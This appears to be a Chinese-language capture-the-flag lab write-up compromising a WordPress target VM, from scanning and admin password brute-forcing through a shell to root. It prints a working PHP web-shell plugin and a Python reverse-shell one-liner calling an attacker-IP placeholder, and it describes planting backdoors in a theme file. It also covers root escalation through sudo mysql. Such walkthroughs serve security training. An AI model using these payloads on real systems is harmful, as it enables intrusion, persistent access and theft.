第四周

测试思路:
1.信息收集  知己知彼,百战百胜。首先发现目标的基本信息,从中发掘出可以利用的漏洞。
2.获取shell 进行漏洞测试,尝试获取shell
3.后渗透 拿到shell进行提权维权

信息收集

1.使用nmap进行主机发现  nmap -sn 192.168.192.0/24  #-sn类似于ping  0/24八位主机号 扫描范围为0-255
发现今天的目标 192.168.192.130

image-20210920120459578

扫描存活主机后进行详细的信息收集  使用nmap -sV 192.168.192.130

发现目标只开启了80端口 为一个APache的web服务  直接在浏览器内进行查看

image-20210920120623551

打开后发现为apache2的一个默认启动页面  没有发现有效信息  转换思路进行文件扫描测试
可以使用dirsearch等工具进行测试 这里使用feroxbuster  kali默认没有安装

image-20210920121513945

使用方法也较为简单  参数为--url ip即可进行测试
初次使用会进行报错  因为它没有内置的字典  默认字典为seclists  需要进行下载 如果不想安装可以给他指定其他字典
feroxbuster --url ip -w /字典地址
扫描后发现大量关于wordpress的文件  猜想该主机有wordpress的服务  发现一个wp-admin的文件猜想为后台登录界面

image-20210920132856382

浏览器打开该页面
发现浏览器加载缓慢  使用burpsuite进行抓包查看

image-20210920133842804

image-20210920134048740

在请求当中出现了这个url  但是我们无法访问地址 造成资源加载缓慢且页面加载不全  我们手动进行修改  在burpsuite proxy模块找到options功能

image-20210920134516981

Add  将响应的的头部和主题内192.168.159.145这个地址替换为靶机地址

image-20210920134932023

重新抓包发送  页面已正常加载  
#注意后续页面测试需要用burp发包  不然还是会无法加载

image-20210920135008147

查看页面没有可利用信息  进入之前发现的后台登录页面
进行测试  输入不存在的用户名时会提示该用户名不存在
输入admin进行测试发现具有该账号

image-20210920135409543

image-20210920135526015

尝试对其进行暴力破解

image-20210920135941130

image-20210920140231355

爆破成功  密码为adam14  登录进入后台

image-20210920140404524

登录成功

打点获取shell

在页面中查看是否有可利用的漏洞

image-20210920140624830

在Media中有文件上传功能  可以进行文件上传漏洞测试

image-20210920140728004

在主题编辑内可以尝试修改404模板写入一句话木马  尝试后发现不可修改

image-20210920140916743

在插件功能中可以手动上传一个自己编写的插件(需要符合wordpress插件规范)
<?php
/*
Plugin Name: WordPress.org Plugin
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     2.0
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
Text Domain: wporg
*/
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
将shell.php打包成zip文件进行上传

image-20210920142552898

image-20210920142655058

image-20210920142952524

发现已经上传成功  进行访问  插件的目录默认保存在wordpress目录
wordpress/wp-content/plugins/shell.php

成功获取到shell  进行反弹shell

image-20210920143209487

通过which查看靶机是否存在nc
which nc 发现存在nc可以进行利用
我们这里继续进行测试 发现还存在python3的环境
这里我们可以采取python的方式来反弹shell
使用nc侦听11111端口

image-20210920143436146

image-20210920143539904

image-20210920150214307

执行shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image-20210920150230363

image-20210920150243262

shell反弹成功

这里我们也可以利用msfdb获得shell

image-20210920150422810

image-20210920150450252

我们使用第二位exploit

image-20210920150608517

查看需要设置的参数  因为不是在根目录下  所以设置TARGETURI为、wordpress  账号密码为我们后台登录的账号密码

image-20210920151204727

image-20210920151215982

run之后获得权限  但是有部分命令无法执行(不推荐)

image-20210920151336717

我们使用python反弹的shell继续进行操作  尝试在主题404页面添加一句话木马(在真实渗透中建议多留几个后门使用)
查看当前目录  进入wp-content 目录下的 themes目录

image-20210920151713796

image-20210920151754984

在主题中我们可以发现使用的Twenty TWenty-One主题  进入后发现404.php

image-20210920151916184

编辑404.php后写入一句话木马即可  使用蚁剑连接

提权

#首先查看靶机文件夹目录
发现文件但是发现没有权限  需要进行提权  测试多次未能提权  思路转向数据库  查看wordpress数据库配置文件

image-20210920164628232

image-20210920164658349

image-20210920163714132

#查看到数据库的配置信息  账号密码

image-20210920164031250

#尝试登录数据库却发现密码错误
调转思路 尝试用wordpress的密码去登录wpadmin账号  发现登入成功

image-20210920164256514

image-20210920170049051

获得第一个flag
尝试二次提权为root
通过sudo mysql -u root -D wordpress -p 
密码仍为adam14  发现登录成功

image-20210920171254524

通过mysql的system命令  直接提权为root  进入root文件夹下获取第二个flag  打靶结束

image-20210920172404955

image-20210920174509306

image-20210920175542153